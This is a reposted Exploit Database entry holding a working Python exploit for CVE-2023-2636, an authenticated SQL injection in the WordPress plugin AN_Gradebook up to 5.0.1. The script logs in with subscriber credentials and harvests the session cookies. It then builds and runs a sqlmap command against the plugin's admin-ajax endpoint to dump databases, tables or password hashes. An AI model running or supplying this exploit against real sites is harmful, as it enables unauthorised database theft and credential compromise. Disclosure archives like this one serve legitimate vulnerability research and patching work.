WordPress Plugin AN_Gradebook 5.0.1 – SQLi

• Exploit Database
• 17 阅读

• 作者： Lukas Kinneberg
  日期： 2023-07-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51632/

• #!/usr/bin/python3
  
  # Exploit Title: WordPress Plugin AN_Gradebook <= 5.0.1 - Subscriber+ SQLi
  # Date: 2023-07-26
  # Exploit Author: Lukas Kinneberg
  # Github: https://github.com/lukinneberg/CVE-2023-2636
  # Vendor Homepage: https://wordpress.org/plugins/an-gradebook/
  # Software Link: https://github.com/lukinneberg/CVE-2023-2636/blob/main/an-gradebook.7z
  # Tested on: WordPress 6.2.2
  # CVE: CVE-2023-2636
  
  
  from datetime import datetime
  import os
  import requests
  import json
  
  # User Input:
  target_ip = 'CHANGE_THIS'
  target_port = '80'
  username = 'hacker'
  password = 'hacker'
  
  banner = '''
  
   ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ 
  ||C |||V |||E |||- |||2 |||0 |||2 |||3 |||- |||2 |||6 |||3 |||6 ||
  ||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
  |/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|
  		Exploit Author: Lukas Kinneberg
  
  '''
  
  print(banner)
  
  print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
  
  # Authentication:
  session = requests.Session()
  auth_url = 'http://' + target_ip + ':' + target_port + '/wp-login.php'
  check = session.get(auth_url)
  # Header:
  header = {
  'Host': target_ip,
  'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
  'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
  'Accept-Encoding': 'gzip, deflate',
  'Content-Type': 'application/x-www-form-urlencoded',
  'Origin': 'http://' + target_ip,
  'Connection': 'close',
  'Upgrade-Insecure-Requests': '1'
  }
  
  # Body:
  body = {
  'log': username,
  'pwd': password,
  'wp-submit': 'Log In',
  'testcookie': '1'
  }
  auth = session.post(auth_url, headers=header, data=body)
  
  # SQL-Injection (Exploit):
  # Generate payload for sqlmap
  cookies_session = session.cookies.get_dict()
  cookie = json.dumps(cookies_session)
  cookie = cookie.replace('"}','')
  cookie = cookie.replace('{"', '')
  cookie = cookie.replace('"', '')
  cookie = cookie.replace(" ", '')
  cookie = cookie.replace(":", '=')
  cookie = cookie.replace(',', '; ')
  
  print('[*] Payload for SQL-Injection:')
  
  # Enter the URL path of the course after the target_port below
  exploitcode_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + r'/wp-admin/admin-ajax.php?action=course&id=3" '
  exploitcode_risk = '--level 2 --risk 2 '
  exploitcode_cookie = '--cookie="' + cookie + '" '
  
  
  # SQLMAP Printout
  print('Sqlmap options:')
  print(' -a, --all Retrieve everything')
  print(' -b, --bannerRetrieve DBMS banner')
  print(' --current-userRetrieve DBMS current user')
  print(' --current-dbRetrieve DBMS current database')
  print(' --passwords Enumerate DBMS users password hashes')
  print(' --tablesEnumerate DBMS database tables')
  print(' --columns Enumerate DBMS database table column')
  print(' --schemaEnumerate DBMS schema')
  print(' --dumpDump DBMS database table entries')
  print(' --dump-allDump all DBMS databases tables entries')
  retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
  exploitcode = exploitcode_url + exploitcode_risk + exploitcode_cookie + retrieve_mode + ' -p id -v 0 --answers="follow=Y" --batch'
  os.system(exploitcode)
  print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))